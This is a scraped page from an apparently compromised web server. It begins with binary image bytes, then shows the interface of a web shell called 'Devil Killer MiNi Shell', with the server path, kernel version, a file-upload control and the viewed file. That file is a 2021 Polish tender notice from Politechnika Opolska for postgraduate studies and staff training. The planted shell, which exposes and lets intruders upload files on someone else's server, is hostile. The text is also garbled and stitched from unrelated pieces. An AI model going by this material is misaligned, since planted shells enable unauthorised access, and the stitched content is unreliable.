JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210721/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210721/0012198001-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00121980 z dnia 2021-07-21</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> „Usługa zorganizowania i realizacji studiów podyplomowych oraz szkoleń <br/>w ramach projektu: „Inżynier XXI wieku przyszłością kluczowych gałęzi gospodarki” na potrzeby Politechniki Opolskiej”. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POLITECHNIKA OPOLSKA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001732</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Prószkowska 76</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Opole</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">45-758</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL524 - Opolski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">a.zyzik@po.edu.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://po.opole.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Usługa zorganizowania i realizacji studiów podyplomowych oraz szkoleń <br/>w ramach projektu: „Inżynier XXI wieku przyszłością kluczowych gałęzi gospodarki” na potrzeby Politechniki Opolskiej”. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e2d1d58b-e9ef-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00121980</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001964/14/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.21 Usługa zorganizowania i realizacji studiów podyplomowych oraz szkoleń</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> „Inżynier XXI wieku przyszłością kluczowych gałęzi gospodarki ”. Projekt, a tym samym przedmiot zamówienia jest współfinansowany ze środków Unii Europejskiej w ramach środków Europejskiego Funduszu Społecznego, Program Operacyjny Wiedza Edukacja Rozwój na lata 2014 – 2020, Oś Priorytetowa III Szkolnictwo wyższe dla gospodarki i rozwoju, Działanie 3.5. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://po.opole.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://po-opole.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem<br/>platformy zakupowej pod adresem: https://po-opole.ezamawiajacy.pl. zwanej dalej platformą.<br/>2.Informacje ośrodkach komunikacji elektronicznej, przy użyciu których zamawiający będzie<br/>komunikował się z wykonawcami, oraz informacje o wymaganiach technicznych i organizacyjnych<br/>sporządzania, wysyłania i odbierania korespondencji elektronicznej:1) zamawiający będzie się<br/>komunikował z wykonawcami za pośrednictwem platformy zakupowej znajdującej się pod<br/>adresem:https://poopole.ezamawiajacy.pl.2)wymagania techniczne i organizacyjne sporządzania,<br/>wysyłania i odbierania korespondencji elektronicznej: a)zgłoszenie do postępowania wymaga<br/>zalogowania wykonawcy do systemu https://poopole.ezamawiajacy.pl.b)wykonawca po wybraniu opcji<br/>„Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie<br/>zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca<br/>zakłada konto wykonując kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło,<br/>następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, klika polecenie „zarejestrujsię”;<br/>c)rejestracja wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym zamawiający zaleca<br/>wykonawcom uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia oferty w postaci<br/>elektronicznej; wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzymainformację, o możliwości przyspieszenia procedury założenia konta, wówczas należy skontaktować się<br/>pod numerem telefonu podanym w ww.potwierdzeniu; d)po założeniu konta wykonawca ma możliwość<br/>złożenia oferty w postępowaniu; komunikacja między zamawiającym a wykonawcami, w szczególności<br/>zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem platformy<br/>zakupowej; za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za<br/>pośrednictwem zakładki „korespondencja”; e)wykonawca może zwrócić się do zamawiającego o<br/>wyjaśnienie treści SWZ. Wniosek należy przesłać za pośrednictwem platformy zakupowej przez opcję<br/>„zadaj pytanie” lub przy użyciu zakładki „korespondencja”. W celu zadania pytania zamawiającemu,<br/>wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE; powoduje to otwarcie okna, w<br/>którym należy uzupełnić dane Wykonawcy temat i treść/przedmiot pytania, po wypełnieniu wskazanych<br/>pól wraz z wymaganym kodem weryfikującym z obrazka wykonawca klika klawisz POTWIERDŹ,<br/>wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy" pytanie wysłane".<br/>3) niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na platformie zakupowej tj.:<br/>a)stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512kb/s; b)komputer<br/>klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor IntelIV 2GHZ, jeden z<br/>systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje; c)<br/>zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej wersji w<br/>przypadku InternetExplorer minimalnie wersja 10.0; d)włączona obsługa JavaScript; e) zainstalowany<br/>program AcrobatReader lub inny obsługujący pliki w formacie .pdf.4) dopuszczalne formaty<br/>przesyłanych danych: plikiowielkości do 100 MB w txt, rtf, pdf ,xps, odt, ods,odp, doc, xls,ppt, docx,<br/>xlsx, pptx, csv, jpg, jpeg, tif,tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg,mp4, m4a,mpeg4, ogg, ogv,<br/>zip, tar, gz, gzip, 7z, html,xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL,XMLsig,XAdES, CAdES, ASIC,<br/>XMLenc; 5) informacje na temat kodowania i czasu odbioru danych: plik załączony przez wykonawcę<br/>na platformie zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania<br/>UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po<br/>upływie terminu otwarcia ofert.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016<br/>r., str. 1; zwanym dalej „RODO”) Beneficjent Projektu w ramach Programu Operacyjnego Wiedza<br/>Edukacja i Rozwój (PO WER), tj. Politechnika Opolska, ul. Prószkowska 76, 45 -758 Opole, w imieniu<br/>Administratora, informuje, że:1) Administratorem Pani/Pana danych osobowych jest minister właściwy<br/>do spraw rozwoju regionalnego pełniący funkcję Instytucji Zarządzającej dla Programu Operacyjnego<br/>Wiedza Edukacja Rozwój 2014-2020, z siedziba w Warszawie, przy ul. Wspólnej 2/4, 00-926<br/>Warszawa. Z Administratorem danych można się skontaktować poprzez adres e-mailowy:<br/>kancelaria@miir.gov.pl lub pisemnie przekazując korespondencję na adres siedziby Administratora. 2)<br/>Administrator wyznaczył inspektora ochrony danych, z którym może się Pani/Pan skontaktować<br/>poprzez email: iod@miir.gov.pl lub pisemnie przekazując korespondencje na adres siedziby<br/>Administratora. Z inspektorem ochrony danych można się kontaktować we wszystkich sprawach<br/>dotyczących przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem<br/>danych. Administrator powierzył przetwarzanie Pani/Pana danych osobowych, na podstawie zawartej<br/>umowy o dofinansowanie projektu, Politechnice Opolskiej. Może się Pani/Pan również skontaktować z<br/>inspektorem ochrony danych Politechniki Opolskiej, podmiotu który realizuje projekt nr POWR.<br/>03.05.00-00-Z104/18-00, poprzez email: iod@po.edu.pl 3) Przetwarzanie Pani/Pana danychosobowych<br/>w ramach Programu Operacyjnego Wiedza Edukacja i Rozwój odbywa się na podstawie<br/>art. 6 ust. 1 lit. c oraz art. 9 ust. 2 lit. g RODO: a) rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>nr 1303/2013 z dnia 17 grudnia 2013 r. ustanawiającego wspólne przepisy dotyczące Europejskiego<br/>Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego, Funduszu Spójności,<br/>Europejskiego Funduszu Rolnego na rzecz Rozwoju Obszarów Wiejskich oraz Europejskiego<br/>Funduszu Morskiego i Rybackiego oraz ustanawiającego przepisy ogólne dotyczące Europejskiego<br/>Funduszu Rozwoju Regionalnego, Europejskiego Funduszu Społecznego, Funduszu Spójności i<br/>Europejskiego Funduszu Morskiego i Rybackiego oraz uchylającego rozporządzenie Rady (WE) nr<br/>1083/2006 (Dz. Urz. UE.L.2013.347.320 z późn. zm.), b) rozporządzenia Parlamentu Europejskiego i<br/>Rady (UE) nr 1304/2013 z dnia 17 grudnia 2013 r.w sprawie Europejskiego Funduszu Społecznego i<br/>uchylającego rozporządzenie Rady (WE) nr 1081/2006 (Dz. Urz. UE.L.2013.347. 470), oraz załącznika<br/>I i II do tego rozporządzenia; c) rozporządzenia Wykonawczego Komisji (UE) nr 1011/2014 z dnia 22<br/>września 2014 r. ustanawiającego szczegółowe przepisy wykonawcze do rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) nr 1303/2013 w odniesieniu do wzorów służących do przekazywania<br/>Komisji określonych informacji oraz szczegółowe przepisy dotyczące wymiany informacji między<br/>beneficjentami a instytucjami zarządzającymi, certyfikującymi, audytowymi i pośredniczącymi (Dz. Urz.<br/>UE L 286 z 30.09.2014). d) ustawy z dnia 11 lipca 2014 r. o zasadach realizacji programów w zakresie<br/>polityki spójności finansowanych w perspektywie finansowej 2014–2020. Pozostałe, szczegółowe<br/>informacje dotyczące obowiązków informacyjnych wynikających z RODO znajdują się w rozdziale II<br/>SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZS/2/2021-B</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest: „Usługa zorganizowania i realizacji studiów podyplomowych<br/>oraz szkoleń w ramach projektu: „Inżynier XXI wieku przyszłością kluczowych gałęzi gospodarki”<br/>na potrzeby Politechniki Opolskiej z podziałem na:<br/>a) zamówienie gwarantowane: Szkolenia dla pracowników Politechniki Opolskiej;<br/>b) zamówienie opcjonalne: Studia podyplomowe oraz szkolenia dla pracowników Politechniki<br/>Opolskiej.<br/>2. Zamawiający gwarantuje zlecenie wykonania zamówienia gwarantowanego a opcjonalnie<br/>może zlecić wykonanie zamówienia opcjonalnego.<br/>3. Zamawiający nie gwarantuje zlecenia wykonania zamówienia opcjonalnego.<br/>4. Szczegółowy zakres przedmiotu zamówienia opisany został w załączniku nr 7. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamówienia opcjonalne: 95 422,00 zł <br/>Zamawiający nie gwarantuje zlecenia wykonania zamówienia opcjonalnego.<br/>termin realizacji zamówienia opcjonalnego: do 30 czerwca 2022 r. od dnia uruchomienia prawa opcji, z tym, że zamówienie opcjonalne będzie uruchamiane w terminie nie dłuższym niż do 30 września 2021r. <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-06-22</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">58</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">DOŚWIADCZENIE WYKONAWCY - trenera prowadzącego szkolenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">42</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.2. O udzielenie zamówienia mogą ubiegać się Wykonawcy,<br/>którzy spełniają warunki dotyczące:1) zdolności do występowania w obrocie<br/>gospodarczym: Zamawiający nie stawia warunku w powyższym zakresie.2) uprawnień do<br/>prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów: Zamawiający nie stawia warunku w powyższym zakresie.3) sytuacji ekonomicznej<br/>lub finansowej: Zamawiający nie stawia warunku w powyższym zakresie.4) zdolności technicznej<br/>lub zawodowej: a) Wykonawca w celu potwierdzenia posiadania zdolności technicznej lub<br/>zawodowej musi wykazać, że należycie wykonał w okresie ostatnich trzech lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie: co<br/>najmniej trzech szkoleń dla co najmniej 15 dorosłych osób każde, z zakresu odpowiadającego<br/>szkoleniom wskazanym w Szczegółowym Opisie Przedmiotu Zamówienia stanowiącym<br/>załącznik nr 7 do SWZ. Ocena spełnienia warunku dokonana zostanie na podstawie:- wykazu<br/>usług sporządzonego zgodnie z załącznikiem nr 6 do SWZ. b) O udzielenie zamówienia mogą ubiegaćsię wykonawcy, którzy wykażą, że dysponują lub będą dysponować wykwalifikowanym<br/>personelem do realizacji zamówienia, tj.• min. jeden trener posiadający min. 4 letnie<br/>doświadczenie zawodowe w prowadzeniu szkoleń z zakresu IT,• min. jeden trener posiadający<br/>min. 4 letnie doświadczenie zawodowe w prowadzeniu szkoleń z zakresu finansów i<br/>księgowości,• min. jeden trener posiadający min. 4 letnie doświadczenie zawodowe w<br/>prowadzeniu szkoleń z zakresu umiejętności miękkich, Na potwierdzenie powyższego warunku,<br/>Wykonawca w formularzu ofertowym w pkt . 3 wypełnia tabele nr 1), 2), 3) pt. Doświadczenie<br/>Wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert oświadczenie o<br/>spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania –<br/>zgodnie z Załącznikiem nr 2 i nr 3 do SWZ; Zamawiający wzywa wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub<br/>dokumentach zamówienia, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:1) Oświadczenie wykonawcy, w<br/>zakresie art. 108 ust. 1 pkt 5 ustawy p.z.p., o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r.poz.<br/>275), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie<br/>do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z<br/>dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o<br/>dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej –załącznik nr 5 doSWZ.2) Odpis lub informacja z Krajowego Rejestru Sądowego lub<br/>z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy<br/>p.z.p., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji;3.Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania<br/>poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o których mowa w ust. 3 pkt 2, składa<br/>dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce<br/>zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.<br/>Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed<br/>upływem terminu składania ofert. 4. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce<br/>zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 3 pkt 2, zastępuje się je w całości<br/>lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo<br/>osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym,<br/>administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu<br/>na siedzibę lub miejsce zamieszkania Wykonawcy. Podmiotowe środki dowodowe oraz inne<br/>dokumenty lub oświadczenia należy przekazać Zamawiającemu przy użyciu środków komunikacji<br/>elektronicznej<br/>dopuszczonych w SWZ. Podmiotowe środki dowodowe sporządzone w języku obcym muszą być<br/>złożone wraz z tłumaczeniem na język polski.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz 